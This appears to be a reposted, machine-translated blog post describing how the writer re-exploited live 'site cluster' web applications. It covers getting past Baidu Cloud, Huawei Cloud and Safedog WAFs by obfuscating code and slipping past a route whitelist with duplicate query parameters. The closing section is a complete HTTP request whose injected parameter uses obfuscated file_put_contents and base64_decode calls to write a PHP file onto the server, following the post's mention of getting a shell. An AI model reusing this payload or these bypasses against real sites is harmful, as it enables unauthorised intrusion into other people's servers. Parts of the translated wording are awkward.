許可された転載、興味があれば公式アカウントをフォローしてください
昨年の集約化スタンド群で残された脆弱性が、今年使用する際にブロックされていることがわかった。愚痴を言うと、これは完全に狂ってしまったのか、百度クラウド waf、華為クラウド waf、安全犬が一緒になって何をしているのか.....
waf バイパス
比較的簡単で、eval コードをフィルタリングすれば良い。
ルーティングホワイトリスト制限バイパス
自由にリクエストを送信すると、ルーティング制限が存在し、指定されたパスのみアクセスが許可されていることがわかる。
しかし、すべてのパスを固定することは不可能である。たとえば、検索機能はユーザー入力を受け取る必要があり、パケットキャプチャで検索インターフェースが正常に使用でき、ルーティングホワイトリスト制限をトリガーしないことを確認した。
したがって、パラメータ汚染を利用して制限を回避できると推測される。例えば:
同名パラメータを挿入#
/index.php?name=bob&name=rose
バックエンドが実際に受け取る可能性がある#
name=rose
getshell 後にコードを確認し、このインターフェースが任意の内容にマッチすることを確認した。
最終ペイロード
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'